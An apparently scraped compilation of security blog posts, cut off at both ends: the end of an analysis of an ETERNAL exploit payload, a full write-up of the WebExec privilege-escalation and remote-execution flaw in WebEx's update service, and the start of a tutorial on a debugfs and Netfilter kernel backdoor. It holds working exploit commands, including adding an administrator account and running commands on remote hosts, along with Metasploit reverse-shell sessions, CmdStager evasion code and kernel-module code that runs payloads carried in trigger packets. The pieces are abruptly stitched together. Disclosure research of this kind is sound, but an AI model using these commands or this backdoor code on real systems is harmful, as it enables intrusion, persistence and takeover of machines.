It is well known (from many flame wars on Windows kernel development mailing lists) that searching for byte sequences to identify functions is unreliable across different versions and service packs of Windows. We have learned from this bug that exploit developers must also be careful to account for differences in single/multi-core and PAE variations of NTOSKRNL and HAL. In this case, the compiler decided to change one movzx instruction to a mov instruction and broke the entire payload.

It is very curious that the KdVersionBlock trick and a byte sequence search is used to find functions in this payload. The Windows 7 payload finds NT and its exports in, as seen, a more reliable way, by searching backwards in memory from the KPCR IDT and then parsing PE headers.

This HAL function can be found through such other means (it appears readily exported by HAL). The corrupted KPCR can also be cleaned up in other ways. But those are both exercises for the reader.

There is circumstantial evidence that primary FuzzBunch development was started in late 2001. The payload seems maybe it was only written for and tested against multi-core processors? Perhaps this could be a indicator as to how recent the XP exploit was first written. Windows XP was broadly released on October 25, 2001. While this is the same year that IBM invented the first dual-core processor (POWER4), Intel and AMD would not have a similar offering until 2004 and 2005, respectively.

This is yet another example of the evolution of these ETERNAL exploits. The Equation Group could have re-used the same exploit and payload primitives, yet chose to develop them using many different methodologies, perhaps so if one methodology was burned they could continue to reap the benefits of their exploit diversification. There is much esoteric Windows kernel internals knowledge that can be learned from studying these exploits.

Technical Rundown of WebExec

This is a technical rundown of a vulnerability that we’ve dubbed «WebExec».

Картинки по запросу WebExecThe summary is: a flaw in WebEx’s WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That’s right: this client-side application that doesn’t listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it’s patched.

High level details and FAQ at https://webexec.org! Below is a technical writeup of how we found the bug and how it works.

Credit

This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.

If you have any questions or concerns, I made an email alias specifically for this issue: info@webexec.org!

You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!

Intro

During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!

As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class «thank you for your service», because we can, and are crossing our fingers that more are out there!

The actual version of WebEx is the latest client build as of August, 2018: Version 3211.0.1801.2200, modified 7/19/2018 SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We’ve tested some older and newer versions since then, and they are still vulnerable.

WebEx released patch on October 3, but requested we maintain embargo until they release their advisory. You can find all the patching instructions on webexec.org.

The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you’re concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:

c:\>sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.

Privilege Escalation

What initially got our attention is that folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called «webexservice» that can be started and stopped by anybody. That’s not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that’s SYSTEM). That’s an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.

Due to the application whitelisting, however, on this particular assessment we couldn’t simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.

One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it’s a service, it runs with the working directory c:\windows\system32, and we couldn’t write to that folder!

At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let’s take a look

Deep dive into WebExService.exe

It’s not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA is the strings windows (shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:

  .rdata:00405438 ; wchar_t aSCreateprocess
  .rdata:00405438 aSCreateprocess:                        ; DATA XREF: sub_4025A0+1E8o
  .rdata:00405438                 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0

I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:

  .text:0040254E                 push    [ebp+lpProcessInformation] ; lpProcessInformation
  .text:00402554                 push    [ebp+lpStartupInfo] ; lpStartupInfo
  .text:0040255A                 push    0               ; lpCurrentDirectory
  .text:0040255C                 push    0               ; lpEnvironment
  .text:0040255E                 push    0               ; dwCreationFlags
  .text:00402560                 push    0               ; bInheritHandles
  .text:00402562                 push    0               ; lpThreadAttributes
  .text:00402564                 push    0               ; lpProcessAttributes
  .text:00402566                 push    [ebp+lpCommandLine] ; lpCommandLine
  .text:0040256C                 push    0               ; lpApplicationName
  .text:0040256E                 push    [ebp+phNewToken] ; hToken
  .text:00402574                 call    ds:CreateProcessAsUserW

The W on the end refers to the UNICODE («wide») version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you’ll find everything you need to know.

In any case, the two most important arguments here are hToken — the user it creates the process as — and lpCommandLine — the command that it actually runs. Let’s take a look at each!

hToken

The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what’s going on. Trying to understand what code’s doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you’ll see shortly.

At the top of the function, we see:

  .text:0040241E                 call    ds:CreateToolhelp32Snapshot

This is a normal way to search for a specific process in Win32 — it creates a «snapshot» of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).

Based simply on knowledge of the APIs, we can deduce that it’s searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:

  .text:00402480                 lea     eax, [ebp+Str1]
  .text:00402486                 push    offset Str2     ; "winlogon.exe"
  .text:0040248B                 push    eax             ; Str1
  .text:0040248C                 call    ds:_wcsicmp
  .text:00402492                 add     esp, 8
  .text:00402495                 test    eax, eax
  .text:00402497                 jnz     short loc_4024BE

Specifically, it’s comparing the name of each process to «winlogon.exe» — so it’s trying to get a handle to the «winlogon.exe» process!

If we continue down the function, you’ll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That’s another common sequence of API calls — it’s how a process can get a handle to another process’s token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.

To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!

An interesting takeaway here is that I didn’t really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!

lpCommandLine

This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don’t be discouraged by this quick summary — I’m skipping an awful lot of dead ends and validation to keep just to the interesting bits.

One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I’d have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea — I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:

C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
[...]

You may need to configure Event Viewer to show everything in the Application logs, I didn’t really know what I was doing, but eventually I found a log entry for WebExService.exe:

  ExecuteServiceCommand::Not enough command line arguments to execute a service command.

That’s handy! Let’s search for that in IDA (alt+T)! That leads us to this code:

  .text:004027DC                 cmp     edi, 3
  .text:004027DF                 jge     short loc_4027FD
  .text:004027E1                 push    offset aExecuteservice ; &quot;ExecuteServiceCommand&quot;
  .text:004027E6                 push    offset aSNotEnoughComm ; &quot;%s::Not enough command line arguments t&quot;...
  .text:004027EB                 push    2               ; wType
  .text:004027ED                 call    sub_401770

A tiny bit of actual reversing: compare edit to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn’t take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let’s try it:

C:\Users\ron>sc start webexservice a b

[...]

Then check Event Viewer again:

  ExecuteServiceCommand::Service command not recognized: b.

Don’t you love verbose error messages? It’s like we don’t even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:

  .text:00402830 loc_402830:                             ; CODE XREF: sub_4027D0+3Dj
  .text:00402830                 push    dword ptr [esi+8]
  .text:00402833                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:00402838                 push    offset aSServiceComman ; "%s::Service command not recognized: %ls"...
  .text:0040283D                 push    2               ; wType
  .text:0040283F                 call    sub_401770

If we scroll up just a bit to determine how we get to that error message, we find this:

  .text:004027FD loc_4027FD:                             ; CODE XREF: sub_4027D0+Fj
  .text:004027FD                 push    offset aSoftwareUpdate ; "software-update"
  .text:00402802                 push    dword ptr [esi+8] ; lpString1
  .text:00402805                 call    ds:lstrcmpiW
  .text:0040280B                 test    eax, eax
  .text:0040280D                 jnz     short loc_402830 ; <-- Jumps to the error we saw
  .text:0040280F                 mov     [ebp+var_4], eax
  .text:00402812                 lea     edx, [esi+0Ch]
  .text:00402815                 lea     eax, [ebp+var_4]
  .text:00402818                 push    eax
  .text:00402819                 push    ecx
  .text:0040281A                 lea     ecx, [edi-3]
  .text:0040281D                 call    sub_4025A0

The string software-update is what the string is compared to. So instead of b, let’s try software-update and see if that gets us further! I want to once again point out that we’re only doing an absolutely minimum amount of reverse engineering at the assembly level — we’re basically entirely using API calls and error messages!

Here’s our new command:

C:\Users\ron>sc start webexservice a software-update

[...]

Which results in the new log entry:

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Exception code: 0xc0000005
  Fault offset: 0x00002643
  Faulting process id: 0x654
  Faulting application start time: 0x01d42dbbf2bcc9b8
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Report Id: 31555e60-99af-11e8-8391-0800271677bd

Uh oh! I’m normally excited when I get a process to crash, but this time I’m actually trying to use its features! What do we do!?

First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you’ll know that it’s a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).

The first thing I tried was the brute-force approach: let’s add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren’t present.

So I started the service with the following commandline:

C:\Users\ron>sc start webexservice a software-update a b c d e f

[...]

That led to a new crash, so progress!

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
  Exception code: 0x40000015
  Fault offset: 0x000a7676
  Faulting process id: 0x774
  Faulting application start time: 0x01d42dbc22eef30e
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
  Report Id: 60a0439c-99af-11e8-8391-0800271677bd

I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard — probably a failed assert()? We don’t really have any output, so it’s hard to say.

This one took me awhile, and this is where I’ll skip the deadends and debugging and show you what worked.

Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you’ll see this function call:

  .text:0040281D                 call    sub_4025A0

If you jump into that function (double click), and scroll down a bit, you’ll see:

  .text:00402616                 mov     [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"

I used the most advanced technique in my arsenal here and googled that string. It turns out that it’s a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That’s a great sign, it means we’re almost there!

A little bit after, in the same function, we see this code:

  .text:004026A2                 push    eax             ; EndPtr
  .text:004026A3                 push    esi             ; Str
  .text:004026A4                 call    ds:wcstod ; <--
  .text:004026AA                 add     esp, 8
  .text:004026AD                 fstp    [esp+0B4h+var_90]
  .text:004026B1                 cmp     esi, [esp+0B4h+EndPtr+4]
  .text:004026B5                 jnz     short loc_4026C2
  .text:004026B7                 push    offset aInvalidStodArg ; &quot;invalid stod argument&quot;
  .text:004026BC                 call    ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)

The line with an error — wcstod() is close to where the abort() happened. I’ll spare you the debugging details — debugging a service was non-trivial — but I really should have seen that function call before I got off track.

I looked up wcstod() online, and it’s another of Microsoft’s cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don’t know exactly what it does from there, but we can assume that it’s looking for a number somewhere.

This is where my advice becomes «be lucky». The reason is, the only number that will actually work here is «1». I don’t know why, or what other numbers do, but I ended up calling the service with the commandline:

C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6

And checked the event log:

  StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).

That looks awfully promising! I changed 2 to an actual process:

  C:\Users\ron>sc start webexservice a software-update 1 calc c d e f

And it opened!

C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K

It actually runs with a GUI, too, so that’s kind of unnecessary. I could literally see it! And it’s running as SYSTEM!

Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!

Local exploit

The simplest exploit is to start cmd.exe with wmic.exe:

C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"

That opens a GUI cmd.exe instance as SYSTEM:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

If we can’t or choose not to open a GUI, we can also escalate privileges:

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add
[...]

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron
testuser

And this all works as an unprivileged user!

Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:

meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2
SESSION => 2

msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST 172.16.222.1
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on 172.16.222.1:9001
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 172.16.222.132
[*] Meterpreter session 2 opened (172.16.222.1:9001 -> 172.16.222.132:49574) at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Remote exploit

We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that’s done, you can use the exact same command against the remote host:

c:\>sc \\10.0.0.0 start webexservice a software-update 1 net localgroup administrators testuser /add

The command will run (and a GUI will even pop up!) on the other machine.

Remote exploitation with Metasploit

To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.

Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:

msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.1.100-110
RHOSTS => 192.168.56.100-110
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-] 192.168.56.105:445    - No service handle retrieved
[+] 192.168.56.105:445    - Command completed!
[-] 192.168.56.103:445    - No service handle retrieved
[+] 192.168.56.103:445    - Command completed!
[+] 192.168.56.104:445    - Command completed!
[+] 192.168.56.101:445    - Command completed!
[*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed

And here’s the full exploit module:

msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/smb/webexec) > exploit

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'...
[*] 192.168.56.101:445 - Command Stager progress -   0.96% done (999/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
...
[*] 192.168.56.101:445 - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Sending stage (179779 bytes) to 192.168.56.101

The actual implementation is mostly straight forward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a meterpreter .exe uploaded to execute it?

I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexecinstead. You lose the magic of WebExec!

After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the command to an .exe file to the filesystem. Using the .vbs flavor of staging, it would write a Base64-encoded file to the disk, then a .vbs stub to decode and execute it!

There are several problems, however:

  • The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
  • CmdStager uses %TEMP% as a temporary directory, but our exploit doesn’t expand paths
  • WebExecService seems to escape quotation marks with a backslash, and I’m not sure how to turn that off

The first two issues could be simply worked around by adding options (once I’d figured out the options to use):

wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05
  execute_cmdstager(opts)
end

execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:

# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finangling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, "").chars.map do |c|
      "Chr(#{c.ord})"
    end.join('+')
  end

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)
end

First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to characters 1 — 1 of the string «A». Or the empty string!

Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn’t use &, because that’s already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.

And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.

In a targeted attack, it’s obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!

Checking for the patch

This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!

The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!

There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it’s no good as a script!

In order to exploit this, you have to be able to get a handle to the service-controlservice (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either OK or ACCESS_DENIED, we know it worked!

Here’s the important code from the Nmap checker module we developed:

-- Create a test service that we can query
local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])

  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)
end

Not shown: we also delete the service once we’re finished.

Conclusion

So there you have it! Escalating privileges from zero to SYSTEM using WebEx’s built-in update service! Local and remote! Check out webexec.org for tools and usage instructions!

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
